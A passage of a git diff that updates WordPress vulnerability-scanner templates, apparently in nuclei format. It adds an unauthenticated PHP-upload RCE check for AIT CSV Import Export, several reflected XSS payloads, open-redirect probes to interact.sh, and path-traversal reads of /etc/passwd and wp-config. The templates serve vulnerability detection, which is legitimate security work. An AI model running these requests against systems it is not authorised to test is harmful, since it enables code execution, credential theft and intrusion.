+    cwe-id: CWE-22
+  tags: wordpress,wp-plugin,lfi,wp,accessmanager,wpscan
 
 requests:
   - method: GET
@@ -18,12 +24,14 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "DB_NAME"
           - "DB_PASSWORD"
-        part: body
         condition: and
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/vulnerabilities/wordpress/age-gate-open-redirect.yaml
index 2c70de7696..e2da295be5 100644
--- a/vulnerabilities/wordpress/age-gate-open-redirect.yaml
+++ b/vulnerabilities/wordpress/age-gate-open-redirect.yaml
@@ -11,14 +11,14 @@ info:
     - https://wordpress.org/plugins/age-gate
   metadata:
     verified: true
-  tags: wp-plugin,redirect,wordpress,wp,agegate,unauth
+  tags: agegate,unauth,wpscan,packetstorm,wp-plugin,redirect,wordpress,wp
 
 requests:
   - method: POST
     path:
       - '{{BaseURL}}/wp-admin/admin-post.php'
 
-    body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com
+    body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://interact.sh
     headers:
       Content-Type: application/x-www-form-urlencoded
 
@@ -26,4 +26,4 @@ requests:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
new file mode 100644
index 0000000000..9a31a4d4e8
--- /dev/null
+++ b/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
@@ -0,0 +1,49 @@
+id: ait-csv-import-export-rce
+
+info:
+  name: WordPress AIT CSV Import Export - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: |
+    The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content.
+  reference:
+    - https://wpscan.com/vulnerability/10471
+    - https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_ait_csv_rce.rb
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 9.8
+    cwe-id: CWE-434
+  tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
+
+requests:
+  - raw:
+      - |
+        POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=------------------------ab360007dbae2de8
+
+        --------------------------ab360007dbae2de8
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
+        Content-Type: application/octet-stream
+
+        sep=;<?php echo md5('ait-csv-import-export-rce');?>
+
+        --------------------------ab360007dbae2de8--
+
+      - |
+        GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "fe394b60dc324c3bac3060d600ad4349"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/05/22
diff --git a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml
index 27d4456e69..a37cc0df7e 100644
--- a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml
+++ b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml
@@ -1,32 +1,32 @@
-id: alfacgiapi-wordpress
+id: alfacgiapi-wordpress
 
-info:
-  name: alfacgiapi
-  author: pussycat0x
-  severity: low
-  description: Searches for sensitive directories present in the ALFA_DATA.
-  reference: https://www.exploit-db.com/ghdb/6999
-  tags: wordpress,listing
+info:
+  name: alfacgiapi
+  author: pussycat0x
+  severity: low
+  description: Searches for sensitive directories present in the alfacgiapi plugin.
+  reference: https://www.exploit-db.com/ghdb/6999
+  tags: wordpress,listing
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-includes/ALFA_DATA/"
-      - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
-      - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
-      - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-      - type: word
-        words:
-          - "/wp-content/plugins/"
-          - "/wp-includes/ALFA_DATA/"
-          - "/ALFA_DATA/alfacgiapi/"
-          - "/cgi-bin/ALFA_DATA/alfacgiapi/"
-        condition: or
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-includes/ALFA_DATA/"
+      - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
+      - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
+      - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+      - type: word
+        words:
+          - "/wp-content/plugins/"
+          - "/wp-includes/ALFA_DATA/"
+          - "/ALFA_DATA/alfacgiapi/"
+          - "/cgi-bin/ALFA_DATA/alfacgiapi/"
+        condition: or
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml
index f9fc49bd56..9203c6cd03 100644
--- a/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml
+++ b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml
@@ -1,13 +1,18 @@
 id: amministrazione-aperta-lfi
 
 info:
-  name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read
+  name: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion
   author: daffainfo,Splint3r7
   severity: high
+  description: WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/50838
     - https://wordpress.org/plugins/amministrazione-aperta
-  tags: wordpress,wp-plugin,lfi,wp
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wp-plugin,lfi,wp,edb,wordpress
 
 requests:
   - method: GET
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/vulnerabilities/wordpress/analytify-plugin-xss.yaml
new file mode 100644
index 0000000000..d4547f82d2
--- /dev/null
+++ b/vulnerabilities/wordpress/analytify-plugin-xss.yaml
@@ -0,0 +1,43 @@
+id: analytify-plugin-xss
+
+info:
+  name: Analytify <4.2.1 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: |
+    WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
+  metadata:
+    verified: true
+    google-query: inurl:/wp-content/plugins/wp-analytify
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wp,wordpress,analytify,wpscan,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/aa404bb?a</script><script>alert(/XSS/)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'text/javascript">alert(/XSS/)</script>'
+          - 'wp-analytify'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 404
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/aspose-file-download.yaml b/vulnerabilities/wordpress/aspose-file-download.yaml
index 2c4b91c5d4..dfc4df3018 100644
--- a/vulnerabilities/wordpress/aspose-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-file-download.yaml
@@ -1,13 +1,17 @@
 id: aspose-file-download
 
 info:
-  name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval
+  name: Wordpress Aspose Cloud eBook Generator - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability.
+  description: Wordpress Aspose Cloud eBook Generator is vulnerable to local file inclusion.
   reference:
     - https://wpscan.com/vulnerability/7866
-  tags: wordpress,wp-plugin,lfi,aspose,ebook
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: aspose,ebook,wpscan,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
@@ -26,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml
index ae52c36233..f87fe938e2 100644
--- a/vulnerabilities/wordpress/aspose-ie-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml
@@ -1,14 +1,14 @@
 id: aspose-ie-file-download
 
 info:
-  name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval
+  name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability.
+  description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion.
   reference:
     - https://packetstormsecurity.com/files/131162/
     - https://wordpress.org/plugins/aspose-importer-exporter
-  tags: wordpress,wp-plugin,lfi,aspose
+  tags: aspose,packetstorm,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
@@ -27,3 +27,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml
index 48c499bc3a..6b86fb889e 100644
--- a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml
@@ -1,14 +1,18 @@
 id: aspose-pdf-file-download
 
 info:
-  name: WordPress Aspose PDF Exporter - Arbitrary File Retrieval
+  name: WordPress Aspose PDF Exporter - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The Aspose.psf Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability.
+  description: WordPress Aspose PDF Exporter is vulnerable to local file inclusion.
   reference:
     - https://packetstormsecurity.com/files/131161
     - https://wordpress.org/plugins/aspose-pdf-exporter
-  tags: wordpress,wp-plugin,lfi,aspose
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: aspose,packetstorm,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/aspose-words-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml
index ac80fecb8c..25a3c59205 100644
--- a/vulnerabilities/wordpress/aspose-words-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml
@@ -1,14 +1,18 @@
 id: aspose-words-file-download
 
 info:
-  name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval
+  name: WordPress Aspose Words Exporter <2.0 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability.
+  description: WordPress Aspose Words Exporter prior to version 2.0 is vulnerable to local file inclusion.
   reference:
     - https://wpscan.com/vulnerability/7869
     - https://wordpress.org/plugins/aspose-doc-exporter
-  tags: wordpress,wp-plugin,lfi,aspose
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wordpress,wp-plugin,lfi,aspose,wpscan
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
index 3dbd07b8b7..71685b4ac5 100644
--- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
+++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
@@ -12,10 +12,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/"
+      - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
new file mode 100644
index 0000000000..0feaccd61a
--- /dev/null
+++ b/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
@@ -0,0 +1,42 @@
+id: avchat-video-chat-xss
+
+info:
+  name: WordPress AVChat Video Chat 1.4.1 - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    WordPress AVChat Video Chat 1.4.1 is vulnerable to reflected cross-site scripting via index_popup.php and multiple parameters.
+  reference:
+    - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
+    - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: xss,,wp,wpscan,wordpress,wp-plugin
+
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value="FB_appId"><script>alert(document.domain)</script>"'
+
+      - type: word
+        words:
+          - 'text/html'
+        part: header
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/brandfolder-lfi.yaml b/vulnerabilities/wordpress/brandfolder-lfi.yaml
index 2cb1f03bf0..651afaf02c 100644
--- a/vulnerabilities/wordpress/brandfolder-lfi.yaml
+++ b/vulnerabilities/wordpress/brandfolder-lfi.yaml
@@ -1,14 +1,18 @@
 id: brandfolder-lfi
 
 info:
-  name: Wordpress brandfolder plugin - RFI & LFI
+  name: Wordpress Brandfolder - Remote/Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
+  description: WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
   reference:
     - https://www.exploit-db.com/exploits/39591
     - https://cxsecurity.com/issue/WLB-2016030120
-  tags: wordpress,wp-plugin,lfi,rfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,rfi,edb,wordpress,wp-plugin
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
index 826c966731..6dbc65b78c 100644
--- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
+++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
@@ -1,21 +1,25 @@
 id: brandfolder-open-redirect
 
 info:
-  name: WordPress Brandfolder Plugin Open Redirect
+  name: WordPress Brandfolder - Open Redirect (RFI & LFI)
   author: 0x_Akoko
-  severity: low
-  description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
+  severity: medium
+  description: |
+    WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
   reference:
     - https://www.exploit-db.com/exploits/39591
-  tags: wordpress,wp-plugin,lfi,rfi
+    - https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1
+  tags: wp,brandfolder,edb,wpscan,wp-plugin,redirect,rfi,wordpress,lfi
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/"
+      - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/"
 
     matchers:
       - type: regex
-        regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
         part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml b/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
deleted file mode 100644
index a668258b91..0000000000
--- a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cab-fare-calculator-lfi
-
-info:
-  name: Cab fare calculator 1.0.3 - Unauthenticated Local File Inclusion
-  author: Hassan Khan Yusufzai - Splint3r7
-  severity: high
-  reference:
-    - https://www.exploit-db.com/exploits/50843
-    - https://wordpress.org/plugins/cab-fare-calculator
-  tags: wordpress,wp-plugin,lfi,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:[x*]:0:0"
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/calameo-publications-xss.yaml b/vulnerabilities/wordpress/calameo-publications-xss.yaml
new file mode 100644
index 0000000000..cd0c040307
--- /dev/null
+++ b/vulnerabilities/wordpress/calameo-publications-xss.yaml
@@ -0,0 +1,42 @@
+id: calameo-publications-xss
+
+info:
+  name: WordPress Manage Calameo Publications 1.1.0 - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    WordPress Manage Calameo Publications 1.1.0 is vulnerable to reflected cross-site scripting via  thickbox_content.php and the attachment_id parameter.
+  reference:
+    - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/
+    - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc
+    - https://wordpress.org/plugins/athlon-manage-calameo-publications/
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wordpress,wp-plugin,xss,wp,wpscan
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ath_upload_calameo_publication(id\"><script>alert(document.domain)</script>&)'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml b/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml
new file mode 100644
index 0000000000..c432420d9e
--- /dev/null
+++ b/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml
@@ -0,0 +1,50 @@
+id: checkout-fields-manager-xss
+
+info:
+  name: WordPress Checkout Fields Manager for WooCommerce <5.5.7 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress Checkout Fields Manager for WooCommerce 5.5.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/ea617acd-348a-4060-a8bf-08ab3b569577
+    - https://wordpress.org/plugins/woocommerce-checkout-manager
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: xss,wp,wordpress,authenticated,woocommerce,wpscan,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=wc-settings&tab=wooccm&section=advanced&">--><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '>--><script>alert(1)</script>&action=wooccm_nuke_options&'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml
index 8ebd3cd3c1..665eda9bea 100644
--- a/vulnerabilities/wordpress/cherry-file-download.yaml
+++ b/vulnerabilities/wordpress/cherry-file-download.yaml
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cwe-id: CWE-22
-  tags: wordpress,wp-plugin,lfi
+  tags: wordpress,wp-plugin,lfi,wpscan
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/cherry-lfi.yaml b/vulnerabilities/wordpress/cherry-lfi.yaml
index b0b6c0a44f..12b2f06f01 100644
--- a/vulnerabilities/wordpress/cherry-lfi.yaml
+++ b/vulnerabilities/wordpress/cherry-lfi.yaml
@@ -13,7 +13,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cwe-id: CWE-22
-  tags: wordpress,wp-plugin,lfi,wp
+  tags: wpscan,wordpress,wp-plugin,lfi,wp
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/church-admin-lfi.yaml b/vulnerabilities/wordpress/church-admin-lfi.yaml
index 9885353c52..0817d5972e 100644
--- a/vulnerabilities/wordpress/church-admin-lfi.yaml
+++ b/vulnerabilities/wordpress/church-admin-lfi.yaml
@@ -1,14 +1,18 @@
 id: church-admin-lfi
 
 info:
-  name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
+  name: WordPress Church Admin 0.33.2.1 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
+  description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
   reference:
     - https://wpscan.com/vulnerability/8997
     - https://id.wordpress.org/plugins/church-admin/
-  tags: wordpress,wp-plugin,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wordpress,wp-plugin,lfi,wpscan
 
 requests:
   - method: GET
@@ -25,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/vulnerabilities/wordpress/churchope-lfi.yaml b/vulnerabilities/wordpress/churchope-lfi.yaml
index a0f1465b83..9ad46eccf8 100644
--- a/vulnerabilities/wordpress/churchope-lfi.yaml
+++ b/vulnerabilities/wordpress/churchope-lfi.yaml
@@ -9,7 +9,7 @@ info:
     - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
   classification:
     cwe-id: CWE-22
-  tags: wordpress,wp-theme,lfi,wp
+  tags: wp,wpscan,wordpress,wp-theme,lfi
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/clearfy-cache-xss.yaml b/vulnerabilities/wordpress/clearfy-cache-xss.yaml
new file mode 100644
index 0000000000..2ec2d9d0af
--- /dev/null
+++ b/vulnerabilities/wordpress/clearfy-cache-xss.yaml
@@ -0,0 +1,50 @@
+id: clearfy-cache-xss
+
+info:
+  name: WordPress Clearfy Cache <2.0.5 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress Clearfy Cache 2.0.5 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
+    - https://wordpress.org/plugins/clearfy
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(1)</script>'
+          - "Webcraftic Clearfy - WordPress optimization plugin"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/curcy-xss.yaml b/vulnerabilities/wordpress/curcy-xss.yaml
new file mode 100644
index 0000000000..c6a2793e0a
--- /dev/null
+++ b/vulnerabilities/wordpress/curcy-xss.yaml
@@ -0,0 +1,50 @@
+id: curcy-xss
+
+info:
+  name: WordPress CURCY - Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress CURCY - Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37
+    - https://wordpress.org/plugins/woo-multi-currency
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=wc-reports&a"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'wc-reports&a\"><script>alert(1)</script>">All'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
